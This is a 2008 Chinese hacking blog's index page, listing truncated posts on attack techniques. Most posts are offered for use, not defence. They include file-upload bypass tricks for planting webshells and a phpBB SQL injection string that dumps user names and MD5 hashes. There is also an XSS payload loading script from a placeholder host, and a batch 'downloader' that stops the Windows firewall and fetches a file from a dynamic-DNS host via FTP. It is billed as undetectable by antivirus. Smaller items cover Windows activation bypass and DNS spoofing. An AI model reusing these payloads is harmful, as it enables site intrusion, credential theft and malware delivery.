• 2008-10-03

    ESET System Analyzer Tool - [网络攻防]

    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>

    #define IMP_VOID __declspec(dllimport) VOID __stdcall
    #define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

    #define OBJ_CASE_INSEN...
    Tag:
    3exxp-0day 发表于19:58:41 | 阅读全文 | 评论 1 | 编辑 | 分享 0

  • 2008-09-14

    上传漏洞利用方法 - [网络攻防]

    1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell。

    2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。

    3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。

    4.gif 文件头欺骗,gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或g...
    Tag:上传漏洞利用
    3exxp-0day 发表于05:40:38 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-09-10

    破别人ASP木马密码的方法 - [网络攻防]

    破解目标:破解一asp木马的经过加密的登破解asp木马密码陆密码。由于木马里没有版本说明,具体也不知道这木马叫什么名。

    破解思路:两种,用加密后的密码替换密文和利用密文及加密算法反解出密码。前者根本算不上真正的破解。

    破解目的:没事破着玩。

    如果得不到asp源代码,那么可以说对破解密码,我毫无胜算。有位华夏的朋友说他得到了一个web的权限,但是无法修改主页,发现其中已经有个asp木马,但密码是经过加密的。那么就有了这篇动画了。好...
    Tag:
    3exxp-0day 发表于14:40:47 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-09-06

    一段提取用户名和md5的代码 - [网络攻防]

    搞了个phpbb的站,用的是很老的links.php漏洞了。注入代码如下:

    links.php?t=search&search_keywords=asd&start=1,1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12,13 FROM phpbb_users where user_id limit 0,1000/*

    这样就提取了1000个用户名和md5,将上边的保存成h...
    Tag:
    3exxp-0day 发表于16:19:21 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-26

    抵御DDoS攻击 - [网络攻防]

    分布式拒绝服务攻击(DDoS:Distributed Denial of Service)是一种特殊形式的拒绝服务攻击。它是利用多台已经被攻击者所控制的傀儡机器对某一台单机发起攻击,在带宽相对的情况下,被攻击的主机很容易失去反应能力。作为一种分布、协作的大规模攻击方式,分布式拒绝服务攻击(DDoS)主要瞄准比较大的站点,像商业公司、搜索引擎和政府部门的站点。由于它利用一批受控制的机器向一台机器发起攻击,来势迅猛,而且往往令人难以防备,具有极大的破坏性。
    对D...
    Tag:怎样防范DDOS
    3exxp-0day 发表于07:54:46 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-23

    Vista不激活也能运行至少一年 - [网络攻防]

    Vista又爆新漏洞,用户只须修改注册表中的一个键值,就可以获得额外使用8次slmgr -rearm(延长激活前使用天数30天),再加上原来的3次rearm和最开始的30天,实际上vista可以免激活运行30*(1+3+8)=360天,整整一年!   M$已经把这个方法叫做一个"hack"。该文章也指出,这个漏洞M$很容易封掉,wga只须一个更新即可抓住所有使用此漏洞的电脑,问题是M$去不去做而已。

      以下是如何使用此延时大法:

      ...
    Tag:Vista不激活
    3exxp-0day 发表于08:36:03 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-23

    利用下载漏洞对数据库发起网络上的攻击 - [网络攻防]

    作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。
      1.强制下载后缀名为asp、asa的数据库文件   大多数的网管为了节省时间,网站上的文章系统、论坛等程序都是直接下...
    Tag:下载漏洞
    3exxp-0day 发表于08:35:21 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-20

    DNS欺骗技术教程 - [网络攻防]

    定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。

    原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。

    现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P...
    Tag:DNS欺骗技术教程
    3exxp-0day 发表于07:43:09 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-20

    XSS中再插JS - [网络攻防]

    <img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

    字符过滤怎么办?用Encode加密后就无敌了~

    未加密前:
    <img src='#' XSS="try{var ...
    Tag:
    3exxp-0day 发表于07:42:36 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-19

    批处理制作下载器 - [网络攻防]

    今天自己搞出来个永远不会被杀的下载者
    好东西就要拿出来和大家分享,,,
    把制作过程告诉大家吧....
    step1
    先在桌面上单机右键,新建-快捷方式

    step2
    在项目位置里输入
    %windir%\system32\cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net > t.t&echo user>>t.t&echo...
    Tag:
    3exxp-0day 发表于08:40:37 | 阅读全文 | 评论 3 | 编辑 | 分享 0
共2页 1 2 下一页 最后一页